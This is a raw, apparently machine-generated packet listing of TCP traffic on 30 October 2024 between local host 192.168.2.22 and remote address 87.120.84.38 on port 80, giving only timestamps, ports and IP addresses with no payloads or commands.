Oct 30, 2024 08:25:04.076973915 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.076996088 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.077008009 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.079835892 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.079891920 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.079902887 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.079902887 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.079912901 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.079933882 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.079947948 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.243642092 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.243673086 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.243684053 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.243755102 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.243772030 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.243782043 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.243793964 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.243805885 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.243849039 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.243894100 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.243894100 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.243894100 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.243894100 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.243894100 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.243917942 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.243936062 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.243946075 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.243949890 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.243958950 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.243968964 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.243982077 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.243993044 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.243993044 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244014025 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244014025 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244285107 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244321108 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244330883 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244343042 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244343996 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244374037 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244386911 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244398117 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244409084 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244435072 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244446993 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244456053 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244496107 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244507074 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244508982 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244527102 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244537115 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244554996 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244554996 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244580984 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244590998 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244631052 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244641066 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244651079 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244657040 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244678974 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244690895 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244714022 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244726896 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244760036 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244796038 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244848013 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244852066 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244859934 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244870901 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244889021 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244895935 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244908094 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244932890 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244935989 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244946957 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244956017 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.244985104 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.244995117 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.245049000 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.245062113 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.245079041 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.245102882 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.245121956 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.245129108 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.245131969 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.245162010 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.245187044 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.245198965 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.245238066 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.245311975 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.245322943 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.245332956 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.245342970 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.245354891 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.245359898 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.245373964 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.245393038 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.249315023 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249325037 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249367952 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.249541044 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249552011 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249562979 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249589920 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.249602079 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.249618053 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249629021 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249639034 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249649048 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249666929 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.249681950 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.249727964 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249738932 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249747992 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249759912 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249777079 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.249788046 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.249808073 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.249844074 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249855995 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249866009 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249876976 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249887943 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249888897 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.249898911 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249908924 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.249914885 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249927044 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.249939919 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.249963999 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.250215054 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250227928 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250237942 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250266075 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.250292063 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250292063 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.250303984 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250313997 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250325918 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250334978 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.250354052 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.250365973 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.250432014 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250442982 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250457048 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250468016 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250479937 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250482082 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.250493050 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250498056 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.250511885 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.250535965 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.250590086 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250607967 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250618935 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250629902 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250642061 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250643969 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.250652075 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250660896 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.250664949 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250675917 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250679016 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.250688076 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250699043 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250705957 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.250705957 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.250724077 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.250750065 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.250750065 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.251054049 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.251101017 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.251120090 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.251142025 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.251152992 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.251163006 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.251168966 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.251189947 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.251189947 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.251202106 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.251214027 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.251214981 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.251235008 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.251245022 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.251264095 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.412782907 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.412796974 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.412807941 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.412818909 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.412868023 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.412885904 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.412904024 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.412916899 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.412928104 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.412940025 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.412954092 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.412971973 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.412981987 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413017035 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413026094 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413058996 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413058996 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413058996 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413059950 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413059950 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413059950 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413062096 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413074970 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413094044 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413105011 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413119078 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413130045 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413167000 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413290977 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413391113 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413403034 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413418055 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413428068 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413439035 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413439035 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413453102 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413477898 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413484097 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413496017 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413523912 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413547039 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413549900 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413562059 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413570881 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413582087 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413589954 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413608074 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413631916 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413729906 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413769007 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413775921 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413780928 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413810015 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413830996 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413842916 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413852930 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413866997 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413876057 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413880110 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413894892 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413913012 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413923025 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.413939953 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413949966 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413959980 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413971901 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413984060 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.413989067 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414004087 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414025068 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414072037 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414082050 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414092064 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414127111 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414136887 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414155960 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414167881 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414174080 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414184093 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414210081 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414216995 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414230108 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414230108 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414258003 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414271116 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414303064 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414314985 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414350033 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414377928 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414387941 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414397955 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414426088 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414437056 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414511919 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414534092 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414546013 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414551020 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414560080 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414562941 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414572001 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414580107 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414599895 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414616108 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414618969 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414640903 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414658070 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414661884 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414671898 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414684057 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414690018 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414710045 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414722919 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414757013 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414768934 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414778948 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414789915 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414803982 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414822102 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414832115 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414863110 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414910078 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414928913 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414941072 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414949894 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414962053 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414982080 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.414988995 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.414999008 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415002108 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415035009 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415093899 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415105104 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415115118 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415127039 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415143967 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415154934 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415174007 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415220022 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415266991 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415287971 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415332079 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415401936 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415412903 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415422916 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415436983 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415448904 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415451050 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415462017 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415468931 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415486097 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415498018 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.415534973 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415545940 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.415556908 CET	80	49163	87.120.84.38	192.168.2.22
